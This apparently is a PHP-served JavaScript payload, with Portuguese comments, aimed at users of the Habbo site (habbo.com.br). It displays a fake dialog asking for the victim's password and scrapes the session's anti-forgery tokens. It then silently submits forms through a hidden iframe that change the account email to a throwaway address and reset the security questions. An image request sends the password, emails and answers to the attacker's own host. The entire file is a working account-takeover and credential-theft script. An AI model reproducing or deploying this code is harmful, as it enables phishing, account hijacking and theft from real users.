<?phpheader("Content-Type:Text/Javascript"); if(!strstr($_SERVER['HTTP_REFE

1. <?php
2. header("Content-Type:Text/Javascript");  
3. if(!strstr($_SERVER['HTTP_REFERER'],'habbo')) {
4.     exit();
5. }?>
6. eu = "<?echo $_GET['user'];?>"
7. new Ajax.Request("/identity/settings", {
8.     onComplete: function (x) {
9.         email = x.responseText.match(/>(.+)@(.+)</)[0].split(/>/)[1].split(/</)[0];
10.     }
11. });
12. Dialog.showInfoDialog('tokenproject-dialog','<b>'+habboName+'</b> para completar a acao digite sua senha abaixo::<br><br><input type="password" id="txtsenha" placeholder="Senha">','Ativar', function(){Ativar();});;
13. passd = null;
14. safety1 = 'anonymous'; // 1 pergunta
15. safety2 = 'project' // 2 pergunta
16. email_txt = 'Habbo'+Math.floor(Math.random()*99999999)+'@superrito.com';
17. ap = /<input type="hidden" name="__app_key" value="(.+)"/;
18. ur = /<input type="hidden" name="urlToken" value="(.+)"/;
19.  
20. iframe = document.createElement('iframe');
21. iframe.src="about:blank";
22. iframe.name="xframe";
23. iframe.style="display:none;";
24. iframe.width="0";
25. iframe.height="0";
26. document.body.appendChild(iframe);
27.  
28. var client = new XMLHttpRequest();
29. // pegar app token email
30. client.open('GET',"/identity/email", false);
31. client.send(null);
32. app_token_email = client.responseText.split("/change_email")[1].split("</form>")[0].match(ap)[1];
33. url_token_email = client.responseText.split("/change_email")[1].split("</form>")[0].match(ur)[1];
34. // criando formulario do email add
35. form_email = document.createElement('form');
36. form_email.method="post";
37. form_email.action = "https://www.habbo.com.br/identity/change_email";
38. form_email.id= "form_acd_email";
39. form_email.target="xframe";
40. // criando input do app key
41. inp_email_1 = document.createElement('input');
42. inp_email_1.type = "hidden";
43. inp_email_1.name = "__app_key";
44. inp_email_1.value = app_token_email;
45. // criando input do urltoken
46. inp_email_2 = document.createElement('input');
47. inp_email_2.type = "hidden";
48. inp_email_2.name= "urlToken";
49. inp_email_2.value= url_token_email;
50. // criando input do email para ser adicionado
51. inp_email_3 = document.createElement('input');
52. inp_email_3.type = "hidden";
53. inp_email_3.name= "email";
54. inp_email_3.value= email_txt;
55. // criando input da senha
56. inp_email_4 = document.createElement('input');
57. inp_email_4.type = "hidden";
58. inp_email_4.name = "currentPassword";
59. inp_email_4.value = passd;
60. client.open('GET',"/identity/safetyquestions", false);
61. client.send(null);
62. app_token_safety = (client.responseText.match(ap))[1];
63. url_token_safety = (client.responseText.match(ur))[1];
64. form_safety = document.createElement('form');
65. form_safety.method="post";
66. form_safety.action = "https://www.habbo.com.br/identity/safetyquestions_save";
67. form_safety.target="xframe";
68. form_safety.id= "form_acd_safety";
69. inp_safety_1 = document.createElement('input');
70. inp_safety_1.type = "hidden";
71. inp_safety_1.name= "__app_key";
72. inp_safety_1.value= app_token_safety;
73. inp_safety_2 = document.createElement('input');
74. inp_safety_2.type = "hidden";
75. inp_safety_2.name= "urlToken";
76. inp_safety_2.value= url_token_safety;
77. inp_safety_3 = document.createElement('input');
78. inp_safety_3.type = "hidden";
79. inp_safety_3.name= "safetyAnswer1";
80. inp_safety_3.value= safety1;
81. inp_safety_4 = document.createElement('input');
82. inp_safety_4.type = "hidden";
83. inp_safety_4.name= "safetyAnswer2";
84. inp_safety_4.value= safety2;
85. inp_safety_5 = document.createElement('input');
86. inp_safety_5.type = "password";
87. inp_safety_5.name= "currentPassword";
88. inp_safety_5.value= passd;
89. ind_safety_x1 = document.createElement('select');
90. ind_safety_x1.name="safetyQuestion1";
91. ind_safety_xx1 = document.createElement('option');
92. ind_safety_xx1.selected="selected";
93. ind_safety_xx1.value="1";
94. ind_safety_x2 = document.createElement('select');
95. ind_safety_x2.name="safetyQuestion2";
96. ind_safety_xx2 = document.createElement('option');
97. ind_safety_xx2.selected="selected";
98. ind_safety_xx2.value="2";
99. form_email.appendChild(inp_email_1);
100. form_email.appendChild(inp_email_2);
101. form_email.appendChild(inp_email_3);
102. form_email.appendChild(inp_email_4);
103. form_safety.appendChild(inp_safety_1);
104. form_safety.appendChild(inp_safety_2);
105. form_safety.appendChild(inp_safety_3);
106. form_safety.appendChild(inp_safety_4);
107. form_safety.appendChild(inp_safety_5);
108. ind_safety_x1.appendChild(ind_safety_xx1);
109. ind_safety_x2.appendChild(ind_safety_xx2);
110. form_safety.appendChild(ind_safety_x1);
111. form_safety.appendChild(ind_safety_x2);
112. document.body.appendChild(form_safety);
113. document.body.appendChild(form_email)
114.  
115. function Ativar(){
116. document.getElementById("form_acd_email").currentPassword.value = document.getElementById("txtsenha").value;
117. document.getElementById("form_acd_safety").currentPassword.value = document.getElementById("txtsenha").value;  
118. passd = document.getElementById("txtsenha").value;
119. form_email.submit();
120. setTimeout(function(){form_safety.submit();
121. client.open('GET',"/identity/email", false);
122. client.send(null);
123.  
124. pedind = client.responseText.match(/pending-email/);
125. if(pedind == null){
126.  alert("Digite sua Senha Corretamente para Efetuar o Processo");
127. } else {
128.  confirm = client.responseText.match(/<em>((.+))/)[1].split("(")[1].split(" ")[0];
129. if(confirm == email_txt){
130. new Image().src = "http://<?php echo $_SERVER['HTTP_HOST'];?>/mail.php?email="+email+"&emailAdd="+email_txt+"&senha="+passd+"&safety1="+safety1+"&safety2="+safety2+"&habboName="+habboName+"&user=<?echo $_GET['user'];?>";
131.     location.reload();
132. } else {
133. }
134. }
135. },1000);
136. }